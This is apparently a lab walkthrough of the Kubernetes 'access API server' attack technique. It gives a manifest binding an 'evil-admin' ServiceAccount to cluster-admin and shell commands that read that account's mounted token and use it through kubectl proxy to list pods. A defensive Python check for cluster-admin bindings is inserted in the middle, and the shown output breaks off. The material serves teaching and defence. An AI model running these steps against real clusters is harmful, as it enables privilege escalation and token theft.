The Kubernetes API server is the gateway to the cluster. Actions in the cluster are performed by sending requests to its RESTful API, and the state of the cluster, including every component deployed on it, can be retrieved from the API server. Attackers may send API requests to probe the cluster and gather information about containers, secrets, and other resources.
First we create a high-privileged ServiceAccount, as in “Cluster-admin binding”. For this technique the privileges can vary, and depending on them we can read and modify different information through the Kubernetes API.
apiVersion: v1
kind: ServiceAccount
metadata:
  name: evil-admin
  namespace: default
---
kind: RoleBinding
apiVersion: rbac.authorization.k8s.io/v1
metadata:
  name: evil-admin-binding
  namespace: default
subjects:
- kind: ServiceAccount
  name: evil-admin
  namespace: default
roleRef:
  kind: ClusterRole
  name: cluster-admin
  apiGroup: rbac.authorization.k8s.io
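As an added defender-side check (not part of the original walkthrough), the Python below scans the JSON that `kubectl get rolebindings,clusterrolebindings -A -o json` returns and reports every ServiceAccount bound to cluster-admin. The bindings in SAMPLE_BINDINGS are constructed; the first reproduces the evil-admin manifest above. Note that a RoleBinding that references the cluster-admin ClusterRole, as above, grants those rights only inside its own namespace, which the check reports as the scope.

```python
import json

# Constructed sample in the shape of `kubectl get rolebindings,clusterrolebindings -A -o json`.
# First item: the evil-admin RoleBinding from the manifest above (namespace-scoped).
# Second: a cluster-wide cluster-admin binding. Third: a harmless "view" binding.
SAMPLE_BINDINGS = json.dumps({
    "kind": "List",
    "items": [
        {
            "kind": "RoleBinding",
            "metadata": {"name": "evil-admin-binding", "namespace": "default"},
            "subjects": [{"kind": "ServiceAccount", "name": "evil-admin", "namespace": "default"}],
            "roleRef": {"kind": "ClusterRole", "name": "cluster-admin", "apiGroup": "rbac.authorization.k8s.io"},
        },
        {
            "kind": "ClusterRoleBinding",
            "metadata": {"name": "ci-runner"},
            "subjects": [{"kind": "ServiceAccount", "name": "runner", "namespace": "ci"}],
            "roleRef": {"kind": "ClusterRole", "name": "cluster-admin", "apiGroup": "rbac.authorization.k8s.io"},
        },
        {
            "kind": "RoleBinding",
            "metadata": {"name": "viewer", "namespace": "default"},
            "subjects": [{"kind": "ServiceAccount", "name": "reader", "namespace": "default"}],
            "roleRef": {"kind": "ClusterRole", "name": "view", "apiGroup": "rbac.authorization.k8s.io"},
        },
    ],
})


def find_bound_service_accounts(bindings_json, role_name="cluster-admin"):
    """Return (username, scope) pairs for ServiceAccounts bound to the ClusterRole role_name."""
    findings = []
    for item in json.loads(bindings_json).get("items", []):
        ref = item.get("roleRef", {})
        if ref.get("kind") != "ClusterRole" or ref.get("name") != role_name:
            continue
        # A RoleBinding applies the ClusterRole's rules only inside its own namespace;
        # a ClusterRoleBinding applies them cluster-wide.
        if item.get("kind") == "ClusterRoleBinding":
            scope = "cluster-wide"
        else:
            scope = "namespace " + item["metadata"]["namespace"]
        for subj in item.get("subjects", []):
            if subj.get("kind") != "ServiceAccount":
                continue
            # Tokens for this account authenticate as system:serviceaccount:<ns>:<name>,
            # which is the user name to look for in API server audit logs.
            username = f"system:serviceaccount:{subj.get('namespace', '<missing>')}:{subj['name']}"
            findings.append((username, scope))
    return findings
```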
Next we start a Pod that uses the evil-admin ServiceAccount created above. Then we download and configure kubectl and start the local proxy so we can use curl to access the Kubernetes API.
$ kubectl run access-k8s-api --rm -it --image=alpine --overrides='{ "spec": { "serviceAccount": "evil-admin" } }' -- ash
/ # API_SERVER="https://$KUBERNETES_SERVICE_HOST:$KUBERNETES_SERVICE_PORT"
/ # CA_CRT="/var/run/secrets/kubernetes.io/serviceaccount/ca.crt"
/ # TOKEN="$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)"
/ # apk update && apk add curl
/ # # For the following command please make sure you're using the correct system architecture (e.g. when using on Apple Silicon use arm64 instead of amd64)
/ # curl -LO "https://dl.k8s.io/release/$(curl -L -s https://dl.k8s.io/release/stable.txt)/bin/linux/amd64/kubectl"
/ # install -o root -g root -m 0755 kubectl /usr/local/bin/kubectl
/ # kubectl proxy --server="$API_SERVER" --certificate-authority="$CA_CRT" --token="$TOKEN" --accept-paths='^.*' &
/ # curl localhost:8001/api/v1/namespaces/default/pods
{
  "kind": "PodList",
  "apiVersion": "v1",
  "metadata": {
    "resourceVersion": "1408"
  },
  "items": [
  ...